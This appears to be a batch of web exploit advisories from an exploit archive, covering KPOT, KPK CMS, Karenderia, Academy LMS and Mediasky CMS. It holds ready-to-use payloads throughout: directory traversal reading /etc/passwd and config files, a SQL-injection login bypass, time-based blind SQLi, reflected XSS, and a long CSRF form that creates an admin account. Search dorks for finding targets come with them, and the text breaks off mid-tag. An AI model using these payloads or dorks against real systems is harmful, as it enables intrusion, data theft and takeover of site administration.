<pre><code>====================================================================================================================================<br />| # Title : KPOT Stealer CMS v2.0 Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md | <br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] onfected file: download.php<br /><br /> <?php<br /> if (isset($_GET['file']))<br /> {<br /> $file = $_GET['file'];<br /> header('Content-Disposition: attachment; filename="'.basename($file).'"');<br /> header('Content-Length: ' . filesize($file));<br /> readfile($file);<br /> }<br /> ?><br /><br />[+] use payload : download.php?file=../../../../../../../../../etc/passwd<br /><br />[+] http://127.0.0.1/KPOT/download.php?file=../../../../../../../../../etc/passwd<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : KPK CMS v1.0 Auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit) | <br />| # Vendor : http://www.kpkcomputer.com/ | <br />| # Dork : "Developed by KPK Computer" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user & pass = ' or 0=0 #<br /><br />[+] http://Targetthai-modeling-associationorg/admin/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Karenderia MRS v5.3 Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(64-bit) | <br />| # Vendor : https://github.com/ashishvazirani/food | <br />| # Dork : 1149 N GOWER ST, 90038 United States Call Us 111111111 |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /exportmanager/ajax/getfiles?f=/../../protected/config/main.php<br /><br />[+] http://127.0.0.1Trgtbastisapp.com/kmrs/exportmanager/ajax/getfiles?f=/../../protected/config/main.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Academy LMS 6.2 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 29/08/2023<br /># Vendor: Creativeitem<br /># Vendor Homepage: https://creativeitem.com/<br /># Software Link: https://demo.creativeitem.com/academy/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /># CVE: CVE-2023-4974<br /># CWE: CWE-89 / CWE-74 / CWE-707<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data, modification of<br />data and crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br />Path: /academy/tutor/filter<br /><br />GET parameter 'price_min' is vulnerable to SQL Injection<br />GET parameter 'price_max' is vulnerable to SQL Injection<br /><br />https://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0<br /><br />---<br />Parameter: price_min (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0<br /><br />Parameter: price_max (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0<br />---<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Academy LMS 6.2 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 29/08/2023<br /># Vendor: Creativeitem<br /># Vendor Homepage: https://creativeitem.com/<br /># Software Link: https://demo.creativeitem.com/academy/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4973<br /># CWE: CWE-79 - CWE-74 - CWE-707<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br />Path: /academy/tutor/filter<br /><br />GET parameter 'searched_word' is vulnerable to XSS<br />GET parameter 'searched_tution_class_type[]' is vulnerable to XSS<br />GET parameter 'searched_price_type[]' is vulnerable to XSS<br />GET parameter 'searched_duration[]' is vulnerable to XSS<br /><br />https://website/academy/tutor/filter?searched_word=[XSS]&searched_tution_class_type%5B%5D=[XSS]&price_min=1&price_max=9&searched_price_type%5B%5D=[XSS]&searched_duration%5B%5D=[XSS]<br /><br /><br />XSS Payload:<br /><br />acoa5"><script>alert(1)</script>dyzs0<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : İtalia Mediasky CMS v2.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.bereewineshop.com/admin/ | <br />| # Dork : Mediasky - Lato Amministrativo |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] use payload : /admin/visimmagine.php?imgname=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E<br /><br />[+] http://www.127.0.0.9bereewineshopcom/admin/visimmagine.php?imgname=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : İtalia Mediasky CMS v2.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.bereewineshop.com/admin/ | <br />| # Dork : Mediasky - Lato Amministrativo |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new admin .<br /><br />[+] Go to the line 18+19 .<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : /admin/reginsuseradmin.php.<br /><br />[+] infected file : /admin/visuseradmin.php<br /><br /><br /> <!DOCTYPE html><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head profile="http://www.w3.org/2005/10/profile"><br /></div><br /><script type="text/javascript"><br /><script data-ad-client="ca-pub-3759463646787718" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /></script><br /> <div class="mainrow"><br /> <div style="float:left;"><h1><b>INSERISCI USER ADMIN</b>:&nbsp;&nbsp;<b style="color:#ff0000;"> </b></h1></div><br /> <br /> <div style="float:left;"><img style="float:left;margin-left:20px;" src="../skin/admingrey/images/mod.png" border="0px" alt="Modifica" title="Modifica"><h2><a href="moduseradmin.php?idaction=2293">Modifica</a></h2></div> <br /> <div style="float:left;"><img style="float:left;margin-left:20px;" src="../skin/admingrey/images/noarch.png" border="0px" alt="Modifica" title="Modifica"><h2><a href="javascript:void(0)" onclick="showhidediv('actionrequest');createLink('urlrequest','Conferma','archuseradmin.php?idaction=')">Ripristina</a></h2></div> <br /> <div style="float:left;"><img style="float:left;margin-left:20px;" src="../skin/admingrey/images/canc.png" border="0px" alt="Modifica" title="Modifica"><h2><a href="javascript:void(0)" onclick="showhidediv('actionrequest');createLink('urlrequest','Conferma','cancuseradmin.php?idaction=')">Cancella</a></h2></div> <br /> </div><br /><br /> <!-- TABELLA MODIFICA RECORD --><br /> <div id="maintable"><br /><form name="formprod" action="http://www127.0.0.1bereewineshopcom/admin/reginsuseradmin.php?menu=5&idsez=5" method="post" onsubmit="return checkFormPaneluser(this);"><br /><input type="hidden" name="ritorno" value="http://www.127.0.0.1/ereewineshopcom/admin/visuseradmin.php?idsez=5&menu=5"/> <br /><table class="formdati"><br /> <tbody><br /> <tr><br /> <td class="coldati"> </td><br /> <td><b style="color:#0051a3;font-size:16px;">DETTAGLIO USER ADMIN</b></td><br /> </tr> <br /> <tr><br /> <td class="coldati">Cognome </td><br /> <td><input type="text" name="admin_pu_cognome" /></td><br /> </tr> <br /> <tr><br /> <td class="coldati">Nome </td><br /> <td><input type="text" name="admin_pu_nome" /></td><br /> </tr><br /><tr><br /> <td class="coldati">Tel.Fisso </td><br /> <td><input type="text" name="admin_pu_telefono" /></td><br /> </tr><br /><tr><br /> <td class="coldati">Cellulare </td><br /> <td><input type="text" name="admin_pu_cellulare" /></td><br /> </tr><br /><tr><br /> <td class="coldati">Indirizzo </td><br /> <td><input type="text" name="admin_pu_indirizzo" /></td><br /> </tr> <br /> <tr><br /> <td class="coldati">Username </td><br /> <td><input type="text" name="admin_pu_user" /></td><br /> </tr> <br /> <tr><br /> <td class="coldati">Password </td><br /> <td><input type="password" name="admin_pu_pass" /></td><br /> </tr><br /> <tr><br /> <td class="coldati">Riscrivi Password </td><br /> <td><input type="password" name="admin_pu_pass2" /></td> <br /> </tr><br /> <tr><br /> <td class="coldati">Email </td><br /> <td><input type="text" name="admin_pu_email" /></td><br /> </tr><br /> <tr><br /> <td class="coldati">Attivo(si/No) </td><br /> <td><input type="checkbox" name="admin_pu_attivo" checked="checked" style="width:15px;" /></td><br /> </tr><br /> <br /> </tbody><br /></table><br /> <div style="text-align:center;margin:10px;"><b style="color:#0051a3;font-size:16px;">ELENCO PERMESSI ATTIVI PER SEZIONE</b></div> <br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>HOME</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>GESTIONE CONTENUTI</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Metatag Generici</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_1" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_1" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_1" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_1" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_1" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Pagine Web</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_2" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_2" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_2" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_2" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_2" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Prodotti</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_15" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_15" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_15" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_15" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_15" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Prodotti - Specifiche</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_18" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_18" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_18" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_18" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_18" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Prodotti - Sezioni</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_16" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_16" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_16" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_16" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_16" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Prodotti - Produttori</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_19" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_19" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_19" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_19" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_19" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Prodotti - Recensioni</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_20" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_20" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_20" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_20" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_20" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Prodotti - Denominazioni</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_28" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_28" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_28" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_28" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_28" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Prodotti - Provenienza</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_29" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_29" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_29" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_29" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_29" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Slideshow Immagini</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_21" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_21" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_21" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_21" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_21" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>GESTIONE ORDINI</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Ordini da evadere</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_4" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_4" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_4" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_4" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_4" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Ordini evasi</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_22" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_22" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_22" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_22" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_22" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Tutti gli Ordini</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_23" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_23" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_23" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_23" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_23" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>ANAGRAFICA CLIENTI</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Clienti Privati</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_3" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_3" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_3" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_3" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_3" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Clienti Aziendali</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_25" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_25" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_25" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_25" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_25" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Tutti i Clienti</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_26" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_26" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_26" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_26" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_26" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>STATISTICHE</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Statistiche</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_6" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_6" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_6" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_6" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_6" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>GESTIONE BACKUP</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" 